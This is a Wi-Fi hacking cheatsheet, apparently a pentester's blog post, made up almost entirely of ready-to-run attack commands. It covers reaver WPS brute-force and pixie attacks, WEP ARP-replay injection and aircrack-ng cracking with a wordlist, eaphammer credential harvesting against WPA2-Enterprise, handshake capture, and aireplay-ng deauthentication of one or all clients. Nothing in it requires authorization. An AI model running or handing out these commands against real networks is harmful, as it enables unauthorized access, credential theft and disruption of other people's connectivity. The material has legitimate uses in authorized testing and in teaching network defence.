Wi-Fi Hacking Cheatsheet

A cheatsheet that contains all the commands that I have used quite often for Wi-Fi penetration tests.

Note: Basic knowledge of WiFi penetration testing is assumed.

Prepare for attack

Check for running processes and kill them:

sudo airmon-ng check kill

Start adapter to obtain the wlan0mon interface:

sudo airmon-ng start wlan0
# wlan0 is your wifi interface

Attacking WPS

Using the tool called wash:

wash -i wlan0mon
  • Look at the tab WPS which indicates the versions.
  • Versions available are: ‘1’, ‘2’:
    • Version 2 is not vulnerable
    • Version 1 is (if visible, continue the read)

WPS bruteforce attack

sudo reaver -b D3:4D:B3:37:13:37 -i wlan0mon
# Where '-b' is the BSSID of the AP)

Which would result in ‘completed’ and show the code for WPS.

WPS pixie attack

sudo reaver -b D3:4D:B3:37:13:37 -i wlan0mon -K

Does a pixie attack, and will result in changing a pin to a specified one from the attack.

Attacking WEP

WEP connecting

Note: the WEP format is 12:24:23:23

cat wpa_supplicant.conf
[..]
network={
        ssid="wifi-old"
        key_mgmt=NONE
        wep_key0=12242323
        wep_tx_keyidx=0
}

And connect to it with

sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf

Obtain the DHCP:

sudo dhclient wlan0

Sending traffic method

airodump-ng -c 6 —bssid D3:4D:B3:37:13:37 -w wep-out wlan0mon

We don’t want to wait for packages, so we send them ourselves:

aireplay-ng -3 -b D3:4D:B3:37:13:37 -h <client mac> wlan0mon
  • -3 is a flag for ‘arp replay’ attack.

Cracking using aircrack-ng

Once this attack is started, it will send a bunch of packets. Wait for ~10.000 data requests. Then crack it using aircrack-ng :

aircrack-ng <.cap file> -w /usr/share/wordlists/rockyou.txt

Capture the auth method

sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon

Send a fake authentication request:

sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

And do a arp replay:

sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_mointor_mode>

follow the same way of connection as mentioned above.

Attacking WPA2 Enterprise (EAP)

Run Eaphammer on 5Ghz using the following command:

sudo ./eaphammer -i wlan0 --essid 5GHZSSID --channel 48 --hw-mode a --channel-width 40 --creds

To run Eaphammer on 2.4Ghz, the following command can be executed:

sudo ./eaphammer -i wlan0 --essid 24GHZSSID --channel 1  --creds

To view more about this tool, see https://github.com/s0lst1c3/eaphammer.

Attacking WPA2 (PSK)

Start the dump of the network:

sudo airodump-ng wlan0mon

Find which got the most clients that you want to attack.

Start the dump on a specific BSSID

sudo airodump-ng -c 3 -w wpa --essid coolwifi --bssid D3:4D:B3:37:13:37 wlan0mon

Deauthenticating a client

sudo aireplay-ng -0 1 -a D3:4D:B3:37:13:37 -c <client mac) wlan0mon

Deauthenticating all clients

If you see clients, but none connect - I got the bad habit of just deauthenticating them all:

sudo aireplay-ng -0 10 -a D3:4D:B3:37:13:37

Cracking is done by the same method as mentioned above.

Attacking WPA2/3 (WPA3 with fallback to WPA2)

This is documented, you can find this at: https://tiem.io/posts/attacking-wpa3-failover/

Bypassing Client-Isolation

For more information on this, see: https://pulsesecurity.co.nz/articles/bypassing-wifi-client-isolation